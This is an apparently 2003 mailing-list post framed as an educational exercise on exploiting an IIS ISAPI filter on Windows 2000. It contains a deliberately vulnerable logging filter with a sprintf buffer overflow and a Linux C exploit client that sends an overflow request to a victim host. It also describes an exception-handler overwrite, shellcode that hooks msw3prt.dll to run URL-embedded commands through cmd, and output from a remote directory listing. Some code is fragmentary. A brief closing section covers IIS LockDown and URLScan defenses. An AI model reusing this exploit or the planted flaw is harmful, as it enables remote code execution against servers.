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An exercise to exploit IIS ISAPI filter

From: <master_moda () yahoo com>
Date: 15 Jan 2003 04:39:14 -0000

An exercise to exploit Internet Information Server on W2000
        --This paper intended for educational purpose only.


Long time back when Codered and Nimda spread across the internet, my 
computers were hardhit by them. After lots of effort of cleaning the 
virus, I began curious how they manage to reproduce around the Internet 
and pass into corperate firewall. Thus I disassembled codered (following 
the description from eeye) and another well known for-fun virus named jill,

And finally as an exercise, I developed a vulnerable ISAPI filter (see 
below) and sucessfully exploited it. The filter is used by IIS on Window 
2000 server. Here is the steps I like to share with other system 
administrators like me who want to know how the virus works:

First comes the vulerable code:


#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <httpfilt.h>
#include <EXCPT.H>
#include <WTYPES.H>

                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
    return TRUE;

BOOL WINAPI  __stdcall 
GetFilterVersion(HTTP_FILTER_VERSION * pVer)
        //set the flags and request the notications that we need for this 
to work

     pVer->dwFlags =     (SF_NOTIFY_SECURE_PORT |
                                                   SF_NOTIFY_ORDER_LOW |

    pVer->dwFilterVersion = HTTP_FILTER_REVISION;
    strcpy( pVer->lpszFilterDesc, "Server Type Changer");
    return TRUE;

DWORD WINAPI   __stdcall
HttpFilterProc(HTTP_FILTER_CONTEXT * pfc, DWORD notificationType,
                  VOID * pvNotification)

        PHTTP_FILTER_LOG pLogData;
        OutputDebugString("Entered HttpFilterProc\n");     

        switch (notificationType)
                 case SF_NOTIFY_LOG:
                         TCHAR sz[256];

                         pLogData = (PHTTP_FILTER_LOG)pvNotification;
                         sprintf(sz, "Client Machine: %s , Username: %s, 
                                Machine: %s, Target Path: %s\n", \
                                pLogData->pszServerName, pLogData-
pszTarget  );



The function of this filter is merely to log the HTTP request from client.
As you can see, the function sprintf has a buffer overflow bug and this is 
the weak point to insert our exploitation code.

compile Logger.cpp into Logger.dll and configure your IIS to import this 
dll----You can do this by rightclicking the victim web server from IIS 
Service Manager,choose properties, then ISAPI Filter and from here you can 
define the Logger.dll as ISAPI filter.

Now comes the exploit description: 

When a malicious client send the exploit code to the vulerable IIS, 
exploit code will reach the IIS memory space because ISAPI filter was 
loaded into the same memory space as its host--IIS. 

As the exploit code overflow the buffer, the return address of normal 
function call got messed up inside IIS filter. And not only that, We will 
let the exploit code continue overflowing the memory as far as the 
excepion handler----the handler is replaced by an address(0x77ed5c99) 
inside kernel.dll, This address contain instruction "call ebx" in my W2000 

An Access violation exception happen when IIS filter handling the 
malicious HTTP request and as a result, system will resort the exception 
handler to clean the mess. But remember that the exception handler itself 
got overwritten also, it is now point to "call ebx", so the IIS 
instruction flow into whatever location the register ebx point to. 

You may figure out that register ebx contain an address not far away from 
our exploit code when exception is raised. Thus when system invoke 
exception handler to clean the mess, the instruction flow divert into our 
exploit code.

The exploit code will then do the following, in a roughly order:
--      spawn a cmd shell with read/write pipe handler
--      modify another dll----msw3prt.dll inside IIS memory in such way 
that any invocation to this dll got divert into our exploit code. Also 
note that the invocation URL to msw3prt will has exploit command embedded 
inside, for example:
Using "[" instead of " " is to avoid " " being interpreted as %20.
--      Exploit code accept the URL and read the exploit command. After 
replace "[" with " ", it then send this to the cmd shell through the shell 
--      Read the execution result from cmd shell and pass back to HTTP 
client through writeClient function available from Extension Control 
block. The Extension Control Block is a block of infomation for ISAPI.

Here is the exploit code from linux

#define SIZE 4106
#define ADJUST  1250

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>

int main(int argc, char *argv[]){

unsigned char httpheader1[20]=  //      GET /HERO.htm"

unsigned char httpheader2[256]= 

char payload[]=
/* Payload encoded with x96*/

unsigned char *ptr;
unsigned char sploit[SIZE];

int s;
unsigned short int a_port;
unsigned long a_host;
struct hostent *ht;
struct sockaddr_in sin;

if (argc != 3){
        printf("usage: %s <victimHost> <victimPort> \n",argv[0]);

if ((ht = gethostbyname(argv[1])) == 0){
sin.sin_port = htons(atoi(argv[2]));
sin.sin_family = AF_INET;
sin.sin_addr = *((struct in_addr *)ht->h_addr);

memcpy(ptr, httpheader1, strlen(httpheader1) );
memset(ptr,'\x90', SIZE - strlen(httpheader1) - strlen(httpheader2) -strlen
ptr+=SIZE - strlen(httpheader1) -strlen(httpheader2) - strlen(payload) - 
memcpy(ptr, payload, strlen(payload) );
ptr+= strlen(payload);
memcpy(ptr, httpheader2, strlen(httpheader2));

if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){

printf("\nconnecting... \n");

if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){

write(s, sploit, SIZE-ADJUST);
sleep (5);
close (s);

printf("sent... \n");


Now here is the demo of how the exploit code work through a web browser 
such as MS internet explorer:

From explorer address send the URL

after a while, the browser got response:

 Volume in drive D has no label.
 Volume Serial Number is 7086-EBAD

 Directory of D:\WINNT\system32

07/11/2002  10:46p      <DIR>          .
07/11/2002  10:46p      <DIR>          ..
10/29/2001  03:29p                 647 $winnt$.inf
10/29/2001  03:35p               4,108 $WINNT$.PNF
06/26/2000  09:15a               2,151 12520437.cpx
06/26/2000  09:15a               2,233 12520850.cpx
12/07/1999  05:00a              32,016 aaaamon.dll
12/07/1999  05:00a              67,344 access.cpl
12/07/1999  05:00a              13,753 accserv.mib
12/07/1999  05:00a              59,904 acctres.dll
12/07/1999  05:00a             150,800 accwiz.exe
12/07/1999  05:00a              61,952
12/07/1999  05:00a             131,856 acledit.dll
12/07/1999  05:00a              78,096 aclui.dll
12/07/1999  05:00a              33,298 acs.mib
12/07/1999  05:00a               4,368 acsetupc.dll
12/07/1999  05:00a              17,168 acsetups.exe
12/07/1999  05:00a              11,536 acsmib.dll
12/07/1999  05:00a              73,776 wshom.ocx
12/07/1999  05:00a              17,680 wshtcpip.dll
12/07/1999  05:00a              39,696 wsnmp32.dll
12/07/1999  05:00a              21,776 wsock32.dll
12/07/1999  05:00a              14,608 wtsapi32.dll
12/07/1999  05:00a              25,872 wupdinfo.dll
12/07/1999  05:00a              47,376 wupdmgr.exe
12/07/1999  05:00a              92,432 xactsrv.dll
12/07/1999  05:00a              28,432 xcopy.exe
12/07/1999  05:00a             110,664 xenroll.dll
12/07/1999  05:00a             641,808 xiffr3_0.dll
12/07/1999  05:00a              17,680 xolehlp.dll
            2017 File(s)    291,632,897 bytes
              33 Dir(s)     531,480,576 bytes free


The New IIS6.0, part of Microsoft .NET server has hugh improvement against 
virus/worm, at least that's the feeling I got when reading MSDN papers:
1.      The IIS LockDown has removed lots of unused dynamic script type, 
including .printer which the above exploit code has abuse. It also disable 
unnecessary service.
2.      The IIS URLScan is a ISAPI filter that try to catch malicious URL: 
        A extreme long URL like the one in our exploit may have malicious 
code embeded inside, so web master can preset the maximum size of URL 
        A URL with non-ascii byte inside is also dangerous, URLScan is 
also able to catch that.

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